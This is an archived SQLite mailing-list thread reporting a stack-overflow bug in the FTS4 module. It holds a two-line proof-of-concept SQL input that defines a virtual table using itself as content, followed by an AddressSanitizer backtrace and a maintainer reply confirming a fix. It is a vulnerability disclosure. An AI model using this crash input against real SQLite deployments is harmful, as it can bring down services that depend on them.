Re: [sqlite] 回复: stack-overflow issue in fts4 module
On 11/25/19, OBones wrote: > Maybe I'm completely wrong, but using t0 both as the name of the virtual > table and the source for its content seems to me like the perfect > condition to create a infinite recursion. You are exactly correct in diagnosing the problem. This is an attack that we didn't think of. The recursion is detected and blocked by check-in https://www.sqlite.org/src/info/2eb997327c2c369c from last week. -- D. Richard Hipp d...@sqlite.org ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] 回复: stack-overflow issue in fts4 module
林性伟(林以) wrote: Hi, Sorry to make you inconvenient. poc, test.sql: CREATE VIRTUAL TABLE t0 USING fts4(content=t0,0); SELECT count() FROM t0(0); Maybe I'm completely wrong, but using t0 both as the name of the virtual table and the source for its content seems to me like the perfect condition to create a infinite recursion. The example in the documentation uses two tables: https://www.sqlite.org/fts3.html#_external_content_fts4_tables_ Regards ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
[sqlite] 回复: stack-overflow issue in fts4 module
Hi, Sorry to make you inconvenient. poc, test.sql: CREATE VIRTUAL TABLE t0 USING fts4(content=t0,0); SELECT count() FROM t0(0); Full asan bt: $ ./sqlite3 SQLite version 3.31.0 2019-11-19 21:22:16 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> .read test.sql ASAN:DEADLYSIGNAL = ==5120==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc62facc08 (pc 0x7fc7deb73ad0 bp 0x7ffc62fad450 sp 0x7ffc62facbf0 T0) #0 0x7fc7deb73acf in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeacf) #1 0x55e8762c6593 in sqlite3MemMalloc ../sqlite3.c:23169 #2 0x55e87624c111 in mallocWithAlarm ../sqlite3.c:27050 #3 0x55e87624c111 in sqlite3Malloc ../sqlite3.c:27080 #4 0x55e87625101f in dbMallocRawFinish ../sqlite3.c:27311 #5 0x55e876253812 in tokenExpr ../sqlite3.c:150870 #6 0x55e8764082d8 in yy_reduce ../sqlite3.c:154723 #7 0x55e8764082d8 in sqlite3Parser ../sqlite3.c:155620 #8 0x55e8764082d8 in sqlite3RunParser ../sqlite3.c:156894 #9 0x55e876415a18 in sqlite3Prepare ../sqlite3.c:126307 #10 0x55e87641665d in sqlite3LockAndPrepare ../sqlite3.c:126379 #11 0x55e87648e4f7 in sqlite3_prepare_v3 ../sqlite3.c:126484 #12 0x55e87648e4f7 in fts3FilterMethod ../sqlite3.c:166603 #13 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #14 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #15 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #16 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #17 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #18 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #19 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #20 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #21 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #22 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #23 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #24 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #25 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685#26 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #27 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #28 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #29 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #30 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #31 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #32 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #33 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #34 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #35 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #36 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #37 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #38 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #39 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #40 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #41 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #42 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #43 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #44 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #45 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #46 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #47 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #48 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #49 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #50 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #51 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #52 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #53 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #54 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #55 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #56 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #57 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #58 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #59 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #60 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #61 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #62 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #63 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #64 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #65 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #66 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #67 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616 #68 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438 #69 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620 #70 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685 #71 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465 #72 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
